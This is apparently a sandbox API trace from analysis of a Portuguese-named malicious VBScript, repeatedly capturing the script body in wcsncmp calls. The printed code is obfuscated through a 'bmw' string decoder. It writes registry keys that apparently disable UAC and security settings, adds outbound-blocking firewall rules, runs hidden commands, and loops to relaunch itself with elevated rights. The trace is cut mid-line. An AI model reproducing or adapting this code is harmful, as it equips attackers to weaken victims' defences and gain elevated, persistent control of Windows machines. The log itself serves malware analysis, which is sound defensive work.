bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.016] wcsncmp (_String1="NFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0223.016] wcsncmp (_String1="FDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0223.016] wcsncmp (_String1="DDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.016] wcsncmp (_String1="DEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.016] wcsncmp (_String1="EEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 